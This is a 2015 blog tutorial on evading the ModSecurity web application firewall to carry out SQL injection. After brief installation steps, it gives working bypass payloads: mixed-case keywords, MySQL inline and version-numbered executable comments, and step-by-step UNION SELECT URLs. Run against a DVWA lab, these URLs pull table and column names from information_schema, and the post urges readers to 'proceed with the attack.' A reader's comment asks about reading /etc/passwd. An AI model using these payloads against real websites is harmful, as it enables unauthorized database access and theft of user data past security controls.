Saturday, 25 July 2015

How to Bypass Mod Security WAF | Rahul Tyagi

Introduction to Web Application Firewall and IDS and IPS
-------------------------------------------------------
Web Application Firewall : When a web site owner deploy a application software containing all kind of attack database in it and filter the request deployed by the vistor , then we can say that the application which is deployed on the website is web application firewall.

Types of WAF
------------
Software WAF: These are the firewall technologies which are just like a software application can be installed on the web server and hence can be used to filter the requested contents.

Linux   :  Mod Security : Free | Paid :.php
Windows :  Dot Defender  : Paid :. asp aspx

Mod Security : Mod Security comes to picture in early 2008 when hackers are on the peak and defacing websites all over the world. This was era when there are many paid firewalls but there was no solution for the middle level organizations.



Mod Security came and gives a little hope to web site owners that it will protect website from hackers.

Problems
--------
1. Attack database was limited.
2. Open source but lack of funding.

OWASP TOP 10 Attack they made open call to hackers and made a huge database of available attacks for web application.

How to Install Mod Security on Ubuntu
--------------------------------------
$ sudo apt-get install libapache2-mod-security
$ sudo a2enmod mod-security
$ sudo /etc/init.d/apache2 force-reload

Understanding the working of WAF
--------------------------------
Every WAF works on two principal formats first White List and Black List filtration.

Black List : It's the second way of securing the website hence it will be having a database of all the non sense attacks especially string based ( order by ), (union all select) etc etc etc.Hence any request carrying this kind of string from VISITOR will be get filtered by the blacklist and in response will block if match with any string from the list.

How to Configure Your Mod Security in Ubuntu After Installation
----------------------------------------------------------------
sudo gedit /etc/apache2/sites-available/000-default.conf

After opening this file i.e 000-default.conf we have to change the IP address of the server or the website name whose traffic which we want to filter from mod security.


Bypassing WAF Validations and Filtration
------------------------------------------

1. Upper Lower Case Method

union all select : UnIoN aLl SeLeCt
http://172.16.191.137/dvwa/vulnerabilities/sqli/?id=1' UnIoN SeLeCt 1,2--+&Submit=Submit#

Inline Comments : /*     */

2. Inline Executable Comments
/*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/

Step 1: Get the tables from the database
http://172.16.191.138/dvwa/vulnerabilities/sqli/?id=1' /*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/ 1,2--+&Submit=Submit#


Target Table is users

Step 2: Get the columns
http://172.16.191.138/dvwa/vulnerabilities/sqli/?id=1' /*!UnIoN*/+/*!aLl*/+/*!SeLeCt*/ 1,column_name from information_schema.columns where table_name='users'--+&Submit=Submit#

Version Based Inline Executable Comments
----------------------------------------
MYSQL
5.00.00 --> 50000
4.00.00 --> 40000
3.00.00 --> 30000
2.00.00 --> 20000
1.00.00 --> 10000

/*!50000UnIoN*/ + /*!50000aLl*/+/*!50000SeLeCt*/

Step 3: http://172.16.191.138/dvwa/vulnerabilities/sqli/?id=1' /*!50000UnIoN*/+/*!50000aLl*/+/*!50000SeLeCt*/ 1,column_name from information_schema.columns where table_name='users'--+&Submit=Submit#

Note: Do the same thing with all the query words and proceed with the attack.



  • Stumble This
  • Fav This With Technorati
  • Add To Del.icio.us
  • Digg This
  • Add To Facebook
  • Add To Yahoo

1 comments:

Unknown said...

what about php code? such as php info or /etc/passwd

Post a Comment